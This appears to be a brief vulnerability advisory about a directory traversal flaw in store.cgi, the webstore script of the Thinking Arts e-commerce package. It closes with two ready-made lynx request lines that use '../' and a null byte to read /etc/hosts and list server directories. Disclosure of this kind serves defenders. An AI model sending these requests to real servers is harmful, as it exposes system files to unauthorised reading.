Name   : WebSPIRS CGI script "show files" Vulnerability.
About  : Thinking Arts LTD E-Commerce package comes with
         a webstore frontend called store.cgi which allows
         people to basically order products on their website
         over a SQL database. 
Problem: Adding the string "/../" to an URL allows an
         attacker to view any file on the server, and
         also list directories within the server

Exploit:

  lynx http://www.VULNERABLE.com/cgi-bin/store.cgi?StartID=../etc/hosts%00.html
  lynx http://www.VULNERABLE.com/cgi-bin/store.cgi?StartID=../etc/%00.html
                                                by: slipy (slipy@b10z.net)